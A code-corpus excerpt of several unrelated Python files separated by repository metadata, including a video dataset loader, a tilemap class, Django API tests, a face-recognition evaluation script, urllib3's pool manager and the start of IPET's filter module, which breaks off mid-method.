logging.info('Using the tf.data service at %s', dataset_service_address)
dataset = dataset_utils.distribute(dataset, dataset_service_address)
pad_batch_size = batch_size_local
if is_test:
pad_batch_size = batch_size_local * num_clips * num_spatial_crops
maybe_pad_batches = functools.partial(
maybe_pad_batch,
train=is_training,
batch_size=pad_batch_size,
return_as_dict=return_as_dict)
shard_batches = functools.partial(dataset_utils.shard, n_devices=num_shards)
current_iter = iter(dataset)
current_iter = map(dataset_utils.tf_to_numpy, current_iter)
current_iter = map(
functools.partial(
map_keys, modalities=modalities, return_as_dict=return_as_dict),
current_iter)
current_iter = map(
functools.partial(
tile_label_key, return_as_dict=return_as_dict),
current_iter)
current_iter = map(maybe_pad_batches, current_iter)
if augmentation_params and augmentation_params.get('do_mixup', False):
raise ValueError('mixup should be done in the trainer.')
current_iter = map(shard_batches, current_iter)
if is_training and dataset_configs.get('prefetch_to_device'):
# Async bind batch to device which speeds up training.
current_iter = jax_utils.prefetch_to_device(
current_iter, dataset_configs.get('prefetch_to_device'))
return current_iter, num_examples
train_iter, n_train_examples = create_dataset_iterator(
'train', batch_size, num_train_val_clips)
eval_iter, n_eval_examples = create_dataset_iterator('validation',
eval_batch_size,
num_train_val_clips)
test_iter, n_test_examples = create_dataset_iterator(test_split,
test_batch_size,
num_test_clips,
keep_test_key)
meta_data = {
'num_classes': dataset_configs.num_classes, # pylint:disable=protected-access
'num_train_examples': (n_train_examples * num_train_val_clips),
'num_eval_examples': (n_eval_examples * num_train_val_clips),
'num_test_examples':
(n_test_examples * num_test_clips * num_spatial_crops),
'input_dtype': getattr(jnp, dtype_str),
'target_is_onehot': True,
}
if return_as_dict:
meta_data['input_shape'] = {
'rgb': (-1, num_frames, crop_size, crop_size, 3),
'spectrogram': (-1, num_spec_frames * spec_shape[0], spec_shape[1], 3)
}
elif len(modalities) == 1 and modalities[0] == 'rgb':
meta_data['input_shape'] = (-1, num_frames, crop_size, crop_size, 3)
elif len(modalities) == 1 and modalities[0] == 'spectrogram':
meta_data['input_shape'] = (-1, num_spec_frames * spec_shape[0],
spec_shape[1], 3)
else:
raise NotImplementedError('modality not supported')
logging.info('Dataset metadata:\n%s', meta_data)
return dataset_utils.Dataset(train_iter, eval_iter, test_iter, meta_data)
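# Hedged example of a minimal config for this loader (paths and counts below are
# placeholders, not real data). Only the four fields checked by validate_config are
# strictly required; everything else falls back to the dataset_configs.get defaults.
def _example_dataset_configs():
  config = ml_collections.ConfigDict()
  config.base_dir = '/path/to/tfrecords'
  config.tables = {'train': 'train@16', 'validation': 'val@4', 'test': 'test@4'}
  config.examples_per_subset = {'train': 10000, 'validation': 1000, 'test': 1000}
  config.num_classes = 527
  config.modalities = ('rgb', 'spectrogram')
  config.return_as_dict = True
  return config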
| 41.559853
| 84
| 0.679488
|
613ff0d284b7b4fd287b982c6c03d0da800fb217
| 1,671
|
py
|
Python
|
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
server/model/tilemap.py
|
jpsachse/megajules3000
|
26ae071cf6456e96d042eaa2239cbaa65113f903
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | null | null | null |
from tile import Tile, SIZE as tile_size
from PIL import Image
class TileMap():
def __init__(self, width, height, name="No Name", startX = -1, startY = -1, entity="Jules_Verne"):
self.name = name
self.entity = entity
self.matrix = list()
self.actions = list()
self.generate_matrix(width, height)
self.startX = startX
self.startY = startY
def generate_matrix(self, width, height):
self.width = width
self.height = height
for h in range(0, height):
self.matrix.append([Tile() for w in range(0, width)])
def as_image(self, root_directory):
complete_image = Image.new("RGBA",
(tile_size * self.width,
tile_size * self.height))
for w in range(0, self.width):
for h in range(0, self.height):
current_tile = self.matrix[h][w]
current_tile_im = Image.open(root_directory + current_tile.image)
box = (w * tile_size, h * tile_size)
complete_image.paste(current_tile_im, box)
return complete_image
def as_collision_map(self):
complete_collision_map = list()
for w in range(0, self.width):
complete_collision_map.append([])
for h in range(0, self.height):
current_tile = self.matrix[h][w]
current_collision = {
"c": current_tile.collision,
"a": current_tile.action_index
}
complete_collision_map[w].append(current_collision)
return complete_collision_map
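# Small usage sketch (added; assumes Tile() is constructible without arguments and
# carries default collision/action_index values, as the methods above imply).
if __name__ == "__main__":
    demo = TileMap(4, 3, name="demo", startX=0, startY=0)
    cmap = demo.as_collision_map()
    print(len(cmap), len(cmap[0]))  # 4 columns of 3 entries each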
| 37.977273
| 102
| 0.564333
|
89d141018b6eba227a583b418bdcc23a95a2495e
| 1,853
|
py
|
Python
|
tests_old/test_api/test_view/test_modelAliases.py
|
appukuttan-shailesh/hbp-validation-framework
|
852cf57ad664aa6d7ba8f2551153b62a342e7727
|
[
"Apache-2.0"
] | 5
|
2020-11-25T08:26:20.000Z
|
2022-02-04T18:56:34.000Z
|
tests_old/test_api/test_view/test_modelAliases.py
|
HumanBrainProject/hbp-validation-framework
|
975c5311539ec0b8ac1db1be1a1006e6f847fa78
|
[
"Apache-2.0"
] | 146
|
2018-03-23T10:09:55.000Z
|
2022-01-03T10:51:00.000Z
|
tests_old/test_api/test_view/test_modelAliases.py
|
appukuttan-shailesh/hbp-validation-framework
|
852cf57ad664aa6d7ba8f2551153b62a342e7727
|
[
"Apache-2.0"
] | 8
|
2018-03-20T14:07:05.000Z
|
2020-07-23T10:11:42.000Z
|
"""
Tests of the ValidationFramework TestsView.
"""
from test_base import *
class ModelAliasesTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.data = DataForTests()
def setUp(self):
#Setup run before every test method.
pass
def test_get_no_param (self):
response = client_authorized.get('/model-aliases/', data={})
# is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 400)
# self.assertEqual(is_valid, True)
def test_get_param_alias_true (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias+"thing"})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, True)
def test_get_param_alias_false (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, False)
def test_get_param_model_id (self):
response = client_authorized.get('/model-aliases/', data={'model_id': self.data.model1.id})
# is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 400)
# self.assertEqual(is_valid, True)
def test_get_param_alias_model_id (self):
response = client_authorized.get('/model-aliases/', data={'alias': self.data.model1.alias, 'model_id':self.data.model1.id})
is_valid = json.loads(response._container[0])['is_valid']
self.assertEqual(response.status_code, 200)
self.assertEqual(is_valid, True)
| 33.690909
| 131
| 0.658931
|
2c324cda23adbb7ee62688675fbc0114ab9575b2
| 1,754
|
py
|
Python
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 300
|
2019-01-28T07:37:53.000Z
|
2022-03-09T02:17:28.000Z
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 15
|
2019-04-22T14:23:01.000Z
|
2021-11-24T09:52:32.000Z
|
src/MS-C2/c2_evaluation/c2ev/testbase/aaa.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 67
|
2019-01-29T05:42:09.000Z
|
2021-12-28T11:09:44.000Z
|
import scipy.io as sio
import numpy as np
import matplotlib.pyplot as plt
gndTruth = list(sio.loadmat('noveltest.mat')['label'])
lblist = list(sio.loadmat('base1.mat')['label'])
predresult = []
prednum = np.array(sio.loadmat('novel1testresrdcp2.mat')['data'])[0]
scr = np.array(sio.loadmat('novel1testresrdcp2.mat')['scr'])[0]
for i in range(len(prednum)):
predresult.append(lblist[prednum[i]])
TF = []
sc = []
wrongnum = 0
negative1 = 0
negative2 = 0
fout = open('wrong.txt','w')
for i in range(len(prednum)):
# print(predresult[i],gndTruth[i])
# input()
if predresult[i]==gndTruth[i]:
if scr[i]<0:
negative1+=1
TF.append(1)
else:
TF.append(0)
if scr[i]<0:
negative2+=1
fout.write(gndTruth[i]+'\t'+predresult[i]+'\t'+str(scr[i])+'\n')
wrongnum+=1
sc.append(scr[i])
fout.close()
print('Negative right:',negative1)
print('Negative wrong:',negative2)
print('Wrong:',wrongnum)
TF = np.float32(TF)
avg = np.mean(TF)
print('Accuracy:',avg)
total = list(zip(TF,sc))
# total = sorted(total,key=lambda x: x[0],reverse=True)
srt = sorted(total,key=lambda x: x[1],reverse=True)
print('Last score',srt[-1][1])
print('First score',srt[0][1])
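# Added explanatory note: laa[i] below is the running precision over the top (i+1)
# highest-scoring predictions. The second loop records the coverage (fraction of
# samples) at which precision drops below 0.99 and the score threshold at that point.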
laa = []
truenumber = 0
sss = 0
thre = 0
for i in range(len(prednum)):
truenumber += srt[i][0]
laa.append(float(truenumber)/(i+1))
for i in range(len(prednum)-1):
if laa[i]>0.99 and laa[i+1]<0.99:
print('99pos:',i)
sss = float(i)/len(prednum)
thre = srt[i][1]
print(len(prednum))
print('Acc:',truenumber/len(prednum))
print('Cov@P=0.99:',sss)
print('Threshold:',thre)
plt.ion()
plt.plot(np.array(list(range(len(laa))))/float(len(laa)),laa)
plt.ylim(0.99,1)
plt.xlim(0.9,1)
plt.show()
plt.grid(True)
input()
| 23.702703
| 69
| 0.63512
|
d3734d0ff090072286066e28a24700088c620859
| 184
|
py
|
Python
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 1
|
2019-01-04T05:47:50.000Z
|
2019-01-04T05:47:50.000Z
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 1
|
2020-07-18T03:52:03.000Z
|
2020-07-18T04:18:01.000Z
|
PyMOTW/source/os/os_exec_example.py
|
axetang/AxePython
|
3b517fa3123ce2e939680ad1ae14f7e602d446a6
|
[
"Apache-2.0"
] | 2
|
2021-03-06T04:28:32.000Z
|
2021-03-06T04:59:17.000Z
|
#!/usr/bin/env python3
"""Using os.exec*().
"""
#end_pymotw_header
import os
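# os.fork() returns the child's PID in the parent and 0 in the child, so the parent
# branch below waits while the child replaces its process image with `pwd -P` via
# os.execlp().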
child_pid = os.fork()
if child_pid:
os.waitpid(child_pid, 0)
else:
os.execlp('pwd', 'pwd', '-P')
| 14.153846
| 33
| 0.630435
|
ed072b01a86a33d6ff8c32739da6539343044321
| 17,303
|
py
|
Python
|
Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/pip/_vendor/urllib3/poolmanager.py
|
ldepaula3/TextAnalyticsApp
|
cd87f2017cf301266a82355d4c781de67b9c6ac9
|
[
"bzip2-1.0.6"
] | null | null | null |
from __future__ import absolute_import
import collections
import functools
import logging
from ._collections import RecentlyUsedContainer
from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool
from .connectionpool import port_by_scheme
from .exceptions import LocationValueError, MaxRetryError, ProxySchemeUnknown
from .packages.six.moves.urllib.parse import urljoin
from .request import RequestMethods
from .util.url import parse_url
from .util.retry import Retry
__all__ = ['PoolManager', 'ProxyManager', 'proxy_from_url']
log = logging.getLogger(__name__)
SSL_KEYWORDS = ('key_file', 'cert_file', 'cert_reqs', 'ca_certs',
'ssl_version', 'ca_cert_dir', 'ssl_context')
# All known keyword arguments that could be provided to the pool manager, its
# pools, or the underlying connections. This is used to construct a pool key.
_key_fields = (
'key_scheme', # str
'key_host', # str
'key_port', # int
'key_timeout', # int or float or Timeout
'key_retries', # int or Retry
'key_strict', # bool
'key_block', # bool
'key_source_address', # str
'key_key_file', # str
'key_cert_file', # str
'key_cert_reqs', # str
'key_ca_certs', # str
'key_ssl_version', # str
'key_ca_cert_dir', # str
'key_ssl_context', # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext
'key_maxsize', # int
'key_headers', # dict
'key__proxy', # parsed proxy url
'key__proxy_headers', # dict
'key_socket_options', # list of (level (int), optname (int), value (int or str)) tuples
'key__socks_options', # dict
'key_assert_hostname', # bool or string
'key_assert_fingerprint', # str
'key_server_hostname', #str
)
#: The namedtuple class used to construct keys for the connection pool.
#: All custom key schemes should include the fields in this key at a minimum.
PoolKey = collections.namedtuple('PoolKey', _key_fields)
def _default_key_normalizer(key_class, request_context):
"""
Create a pool key out of a request context dictionary.
According to RFC 3986, both the scheme and host are case-insensitive.
Therefore, this function normalizes both before constructing the pool
key for an HTTPS request. If you wish to change this behaviour, provide
alternate callables to ``key_fn_by_scheme``.
:param key_class:
The class to use when constructing the key. This should be a namedtuple
with the ``scheme`` and ``host`` keys at a minimum.
:type key_class: namedtuple
:param request_context:
        A dictionary-like object that contains the context for a request.
:type request_context: dict
:return: A namedtuple that can be used as a connection pool key.
:rtype: PoolKey
"""
# Since we mutate the dictionary, make a copy first
context = request_context.copy()
context['scheme'] = context['scheme'].lower()
context['host'] = context['host'].lower()
# These are both dictionaries and need to be transformed into frozensets
for key in ('headers', '_proxy_headers', '_socks_options'):
if key in context and context[key] is not None:
context[key] = frozenset(context[key].items())
# The socket_options key may be a list and needs to be transformed into a
# tuple.
socket_opts = context.get('socket_options')
if socket_opts is not None:
context['socket_options'] = tuple(socket_opts)
# Map the kwargs to the names in the namedtuple - this is necessary since
# namedtuples can't have fields starting with '_'.
for key in list(context.keys()):
context['key_' + key] = context.pop(key)
# Default to ``None`` for keys missing from the context
for field in key_class._fields:
if field not in context:
context[field] = None
return key_class(**context)
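# Illustrative note (toy values, added for clarity): contexts differing only in the
# case of scheme/host normalize to the same PoolKey, e.g.
#   _default_key_normalizer(PoolKey, {'scheme': 'HTTP', 'host': 'Example.com', 'port': 80})
# equals the all-lowercase variant, so both requests end up sharing one connection pool.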
#: A dictionary that maps a scheme to a callable that creates a pool key.
#: This can be used to alter the way pool keys are constructed, if desired.
#: Each PoolManager makes a copy of this dictionary so they can be configured
#: globally here, or individually on the instance.
key_fn_by_scheme = {
'http': functools.partial(_default_key_normalizer, PoolKey),
'https': functools.partial(_default_key_normalizer, PoolKey),
}
pool_classes_by_scheme = {
'http': HTTPConnectionPool,
'https': HTTPSConnectionPool,
}
class PoolManager(RequestMethods):
"""
Allows for arbitrary requests while transparently keeping track of
necessary connection pools for you.
:param num_pools:
Number of connection pools to cache before discarding the least
recently used pool.
:param headers:
Headers to include with all requests, unless other headers are given
explicitly.
:param \\**connection_pool_kw:
Additional parameters are used to create fresh
:class:`urllib3.connectionpool.ConnectionPool` instances.
Example::
>>> manager = PoolManager(num_pools=2)
>>> r = manager.request('GET', 'http://google.com/')
>>> r = manager.request('GET', 'http://google.com/mail')
>>> r = manager.request('GET', 'http://yahoo.com/')
>>> len(manager.pools)
2
"""
proxy = None
def __init__(self, num_pools=10, headers=None, **connection_pool_kw):
RequestMethods.__init__(self, headers)
self.connection_pool_kw = connection_pool_kw
self.pools = RecentlyUsedContainer(num_pools,
dispose_func=lambda p: p.close())
# Locally set the pool classes and keys so other PoolManagers can
# override them.
self.pool_classes_by_scheme = pool_classes_by_scheme
self.key_fn_by_scheme = key_fn_by_scheme.copy()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.clear()
# Return False to re-raise any potential exceptions
return False
def _new_pool(self, scheme, host, port, request_context=None):
"""
Create a new :class:`ConnectionPool` based on host, port, scheme, and
any additional pool keyword arguments.
If ``request_context`` is provided, it is provided as keyword arguments
to the pool class used. This method is used to actually create the
connection pools handed out by :meth:`connection_from_url` and
companion methods. It is intended to be overridden for customization.
"""
pool_cls = self.pool_classes_by_scheme[scheme]
if request_context is None:
request_context = self.connection_pool_kw.copy()
# Although the context has everything necessary to create the pool,
# this function has historically only used the scheme, host, and port
# in the positional args. When an API change is acceptable these can
# be removed.
for key in ('scheme', 'host', 'port'):
request_context.pop(key, None)
if scheme == 'http':
for kw in SSL_KEYWORDS:
request_context.pop(kw, None)
return pool_cls(host, port, **request_context)
def clear(self):
"""
Empty our store of pools and direct them all to close.
This will not affect in-flight connections, but they will not be
re-used after completion.
"""
self.pools.clear()
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
"""
Get a :class:`ConnectionPool` based on the host, port, and scheme.
If ``port`` isn't given, it will be derived from the ``scheme`` using
``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is
provided, it is merged with the instance's ``connection_pool_kw``
variable and used to create the new connection pool, if one is
needed.
"""
if not host:
raise LocationValueError("No host specified.")
request_context = self._merge_pool_kwargs(pool_kwargs)
request_context['scheme'] = scheme or 'http'
if not port:
port = port_by_scheme.get(request_context['scheme'].lower(), 80)
request_context['port'] = port
request_context['host'] = host
return self.connection_from_context(request_context)
def connection_from_context(self, request_context):
"""
Get a :class:`ConnectionPool` based on the request context.
``request_context`` must at least contain the ``scheme`` key and its
value must be a key in ``key_fn_by_scheme`` instance variable.
"""
scheme = request_context['scheme'].lower()
pool_key_constructor = self.key_fn_by_scheme[scheme]
pool_key = pool_key_constructor(request_context)
return self.connection_from_pool_key(pool_key, request_context=request_context)
def connection_from_pool_key(self, pool_key, request_context=None):
"""
Get a :class:`ConnectionPool` based on the provided pool key.
``pool_key`` should be a namedtuple that only contains immutable
objects. At a minimum it must have the ``scheme``, ``host``, and
``port`` fields.
"""
with self.pools.lock:
# If the scheme, host, or port doesn't match existing open
# connections, open a new ConnectionPool.
pool = self.pools.get(pool_key)
if pool:
return pool
# Make a fresh ConnectionPool of the desired type
scheme = request_context['scheme']
host = request_context['host']
port = request_context['port']
pool = self._new_pool(scheme, host, port, request_context=request_context)
self.pools[pool_key] = pool
return pool
def connection_from_url(self, url, pool_kwargs=None):
"""
Similar to :func:`urllib3.connectionpool.connection_from_url`.
If ``pool_kwargs`` is not provided and a new pool needs to be
constructed, ``self.connection_pool_kw`` is used to initialize
the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs``
is provided, it is used instead. Note that if a new pool does not
need to be created for the request, the provided ``pool_kwargs`` are
not used.
"""
u = parse_url(url)
return self.connection_from_host(u.host, port=u.port, scheme=u.scheme,
pool_kwargs=pool_kwargs)
def _merge_pool_kwargs(self, override):
"""
Merge a dictionary of override values for self.connection_pool_kw.
This does not modify self.connection_pool_kw and returns a new dict.
Any keys in the override dictionary with a value of ``None`` are
removed from the merged dictionary.
"""
base_pool_kwargs = self.connection_pool_kw.copy()
if override:
for key, value in override.items():
if value is None:
try:
del base_pool_kwargs[key]
except KeyError:
pass
else:
base_pool_kwargs[key] = value
return base_pool_kwargs
def urlopen(self, method, url, redirect=True, **kw):
"""
Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`
with custom cross-host redirect logic and only sends the request-uri
portion of the ``url``.
The given ``url`` parameter must be absolute, such that an appropriate
:class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.
"""
u = parse_url(url)
conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)
kw['assert_same_host'] = False
kw['redirect'] = False
if 'headers' not in kw:
kw['headers'] = self.headers.copy()
if self.proxy is not None and u.scheme == "http":
response = conn.urlopen(method, url, **kw)
else:
response = conn.urlopen(method, u.request_uri, **kw)
redirect_location = redirect and response.get_redirect_location()
if not redirect_location:
return response
# Support relative URLs for redirecting.
redirect_location = urljoin(url, redirect_location)
# RFC 7231, Section 6.4.4
if response.status == 303:
method = 'GET'
retries = kw.get('retries')
if not isinstance(retries, Retry):
retries = Retry.from_int(retries, redirect=redirect)
# Strip headers marked as unsafe to forward to the redirected location.
# Check remove_headers_on_redirect to avoid a potential network call within
# conn.is_same_host() which may use socket.gethostbyname() in the future.
if (retries.remove_headers_on_redirect
and not conn.is_same_host(redirect_location)):
for header in retries.remove_headers_on_redirect:
kw['headers'].pop(header, None)
try:
retries = retries.increment(method, url, response=response, _pool=conn)
except MaxRetryError:
if retries.raise_on_redirect:
raise
return response
kw['retries'] = retries
kw['redirect'] = redirect
log.info("Redirecting %s -> %s", url, redirect_location)
return self.urlopen(method, redirect_location, **kw)
class ProxyManager(PoolManager):
"""
Behaves just like :class:`PoolManager`, but sends all requests through
the defined proxy, using the CONNECT method for HTTPS URLs.
:param proxy_url:
The URL of the proxy to be used.
:param proxy_headers:
A dictionary containing headers that will be sent to the proxy. In case
of HTTP they are being sent with each request, while in the
HTTPS/CONNECT case they are sent only once. Could be used for proxy
authentication.
Example:
>>> proxy = urllib3.ProxyManager('http://localhost:3128/')
>>> r1 = proxy.request('GET', 'http://google.com/')
>>> r2 = proxy.request('GET', 'http://httpbin.org/')
>>> len(proxy.pools)
1
>>> r3 = proxy.request('GET', 'https://httpbin.org/')
>>> r4 = proxy.request('GET', 'https://twitter.com/')
>>> len(proxy.pools)
3
"""
def __init__(self, proxy_url, num_pools=10, headers=None,
proxy_headers=None, **connection_pool_kw):
if isinstance(proxy_url, HTTPConnectionPool):
proxy_url = '%s://%s:%i' % (proxy_url.scheme, proxy_url.host,
proxy_url.port)
proxy = parse_url(proxy_url)
if not proxy.port:
port = port_by_scheme.get(proxy.scheme, 80)
proxy = proxy._replace(port=port)
if proxy.scheme not in ("http", "https"):
raise ProxySchemeUnknown(proxy.scheme)
self.proxy = proxy
self.proxy_headers = proxy_headers or {}
connection_pool_kw['_proxy'] = self.proxy
connection_pool_kw['_proxy_headers'] = self.proxy_headers
super(ProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw)
def connection_from_host(self, host, port=None, scheme='http', pool_kwargs=None):
if scheme == "https":
return super(ProxyManager, self).connection_from_host(
host, port, scheme, pool_kwargs=pool_kwargs)
return super(ProxyManager, self).connection_from_host(
self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs)
def _set_proxy_headers(self, url, headers=None):
"""
Sets headers needed by proxies: specifically, the Accept and Host
headers. Only sets headers not provided by the user.
"""
headers_ = {'Accept': '*/*'}
netloc = parse_url(url).netloc
if netloc:
headers_['Host'] = netloc
if headers:
headers_.update(headers)
return headers_
def urlopen(self, method, url, redirect=True, **kw):
"Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute."
u = parse_url(url)
if u.scheme == "http":
# For proxied HTTPS requests, httplib sets the necessary headers
# on the CONNECT to the proxy. For HTTP, we'll definitely
# need to set 'Host' at the very least.
headers = kw.get('headers', self.headers)
kw['headers'] = self._set_proxy_headers(url, headers)
return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw)
def proxy_from_url(url, **kw):
return ProxyManager(proxy_url=url, **kw)
| 38.365854
| 93
| 0.626886
|
8c4792a378b1ddb48550ec9e599160ffe40c7742
| 23,991
|
py
|
Python
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 14
|
2016-12-20T06:49:32.000Z
|
2021-05-12T11:17:27.000Z
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 69
|
2016-12-15T16:37:27.000Z
|
2021-08-16T10:12:36.000Z
|
ipet/evaluation/IPETFilter.py
|
1hoen/ipet
|
e4135ff936d3aa447a960d854f9c51554e5ba7dc
|
[
"MIT"
] | 11
|
2016-12-30T07:46:18.000Z
|
2021-10-09T02:34:45.000Z
|
"""
The MIT License (MIT)
Copyright (c) 2018 Zuse Institute Berlin, www.zib.de
Permissions are granted as stated in the license file you have obtained
with this software. If you find the library useful for your purpose,
please refer to README.md for how to cite IPET.
@author: Gregor Hendel
"""
import xml.etree.ElementTree as ElementTree
import numpy as np
from ipet.concepts import IpetNode, IpetNodeAttributeError
import logging
import pandas as pd
from ipet.evaluation import TestSets
logger = logging.getLogger(__name__)
class IPETValue(IpetNode):
nodetag = "Value"
def __init__(self, name = None, active = True):
"""
constructs an Ipet Instance
Parameters
----------
name : The name of this problem
active : True or "True" if this element should be active, False otherwise
"""
super(IPETValue, self).__init__(active)
self.name = name
def checkAttributes(self):
if self.name is None:
raise IpetNodeAttributeError("name", "No name specified")
return True
def getEditableAttributes(self):
return ["name"] + super(IPETValue, self).getEditableAttributes()
@staticmethod
def getNodeTag():
return IPETValue.nodetag
def getName(self):
return self.name
def getValue(self, dtype = None):
if dtype is None:
for mytype in [int, float, str]:
try:
return mytype(self.name)
except ValueError:
continue
elif dtype != object:
return dtype.type(self.name)
return self.name
def toXMLElem(self):
me = ElementTree.Element(IPETValue.getNodeTag(), self.attributesToStringDict())
return me
class IPETComparison:
"""
comparison operators for filters. All standard binary comparisons + float comparisons (with tolerance)
+ percentage based inequality
"""
comparisondict = {
"le":"le",
"lt":"lt",
"gt":"gt",
"ge":"ge",
"eq":"eq",
"neq":"neq"
}
def __init__(self, operator):
"""
constructs a comparison object by passing an appropriate operator as string
"""
if str(operator) in IPETComparison.comparisondict:
self.operator = str(operator)
else:
raise KeyError("Unknown key value %s" % (operator))
def compare(self, x, y):
method = getattr(self, "method_" + IPETComparison.comparisondict[self.operator])
try:
return method(x, y)
except TypeError as t:
logger.error("Got type error %s comparing elements x:%s and y:%s" % (t, x, y))
return 0
def method_le(self, x, y):
return x <= y
def method_lt(self, x, y):
return x < y
def method_ge(self, x, y):
return x >= y
def method_gt(self, x, y):
return x > y
def method_eq(self, x, y):
return x == y
def method_neq(self, x, y):
return x != y
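# Small illustration (toy values, added for clarity):
#   IPETComparison("le").compare(1, 2)  -> True
#   IPETComparison("neq").compare(3, 3) -> False
# Constructing IPETComparison with an operator outside comparisondict raises a KeyError.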
class IPETFilter(IpetNode):
"""
Filters are used for selecting subsets of problems to analyze.
"""
valueoperators = ["keep", "drop"]
listoperators = ["diff", "equal"]
attribute2Options = {
"anytestrun":["one", "all"],
"operator":list(IPETComparison.comparisondict.keys())
+valueoperators
+listoperators}
nodetag = "Filter"
DEFAULT_ANYTESTRUN = 'all'
_storedcol_ = None
_storeddf_ = None
def __init__(self, expression1 = None, expression2 = None, operator = "ge", anytestrun = DEFAULT_ANYTESTRUN, active = True, datakey = None):
"""
filter constructor
Parameters
----------
expression1 : integer, float, string, or column name
expression2 : integer, float, string, or column name
datakey : available data key for drop and keep filters
operator : operator such that evaluation expression1 op expression2 yields True or False
anytestrun : either 'one' or 'all'
active : True or "True" if this filter should be active, False otherwise
"""
super(IPETFilter, self).__init__(active)
self.expression1 = expression1
self.expression2 = expression2
self.anytestrun = anytestrun
self.values = []
self._updatevalueset = False
self.set_operator(operator)
self.datakey = datakey
def checkAttributes(self):
if self.operator in self.valueoperators and self.values == []:
raise IpetNodeAttributeError("operator", "Trying to use a filter with operator {0} and empty value set".format(self.operator))
        if self.operator in self.valueoperators and (self.datakey is None or self.datakey == ""):
raise IpetNodeAttributeError("datakey", "Trying to use a filter with operator '{}' and unspecified data key '{}'".format(self.operator, self.datakey))
if self.anytestrun not in self.attribute2Options["anytestrun"]:
raise IpetNodeAttributeError("anytestrun", "Wrong attribute {} passed as 'anytestrun' property. Should be in {}".format(self.anytestrun, self.attribute2Options["anytestrun"]))
return True
@staticmethod
def fromDict(attrdict):
expression1 = attrdict.get('expression1')
expression2 = attrdict.get('expression2')
anytestrun = attrdict.get('anytestrun', IPETFilter.DEFAULT_ANYTESTRUN)
operator = attrdict.get('operator')
datakey = attrdict.get('datakey')
active = attrdict.get('active', True)
return IPETFilter(expression1, expression2, operator, anytestrun, active, datakey)
@staticmethod
def processXMLElem(elem):
"""
inspect and process an xml element
"""
elemdict = dict(elem.attrib)
# filter_ must be written with a trailing underscore "_" not to conflict with the filter method of Python
filter_ = IPETFilter.fromDict(elemdict)
# add values one by one
for child in elem:
# catch wrong children
if not child.tag == IPETValue.getNodeTag():
raise AttributeError("Cannot add a child of type {} to a Filter".format(child.tag))
instancename = child.attrib.get("name")
if instancename:
filter_.addChild(IPETValue(instancename))
# check the filter attributes
filter_.checkAttributes()
return filter_
def getName(self):
prefix = self.anytestrun
if self.operator in self.valueoperators:
return "{} value filter (key: {})".format(self.operator, self.datakey)
elif self.operator in self.listoperators:
return "{}-{} list filter (key: {})".format(self.anytestrun, self.operator, self.datakey)
else:
return " ".join(map(str, (prefix, self.expression1, self.operator, self.expression2)))
def set_operator(self, operator):
self.operator = operator
if self.operator in list(IPETComparison.comparisondict.keys()):
self.comparison = IPETComparison(self.operator)
def getEditableAttributes(self):
"""
returns editable attributes depending on the selected operator
if a binary operator is selected, two expressions as left and right hand side of operator must be chosen
For problem operators, no expressions are selectable.
"""
parenteditables = super(IPETFilter, self).getEditableAttributes()
if self.operator in list(IPETComparison.comparisondict.keys()):
return parenteditables + ['operator', 'anytestrun', 'expression1', 'expression2']
else:
return parenteditables + ['operator', 'anytestrun', 'datakey']
@staticmethod
def getNodeTag():
return IPETFilter.nodetag
def getChildren(self):
return self.values
def acceptsAsChild(self, child):
return child.__class__ is IPETValue
def addChild(self, child):
self.values.append(child)
self._updatevalueset = True
def removeChild(self, child):
self.values.remove(child)
self._updatevalueset = True
def getActiveValues(self):
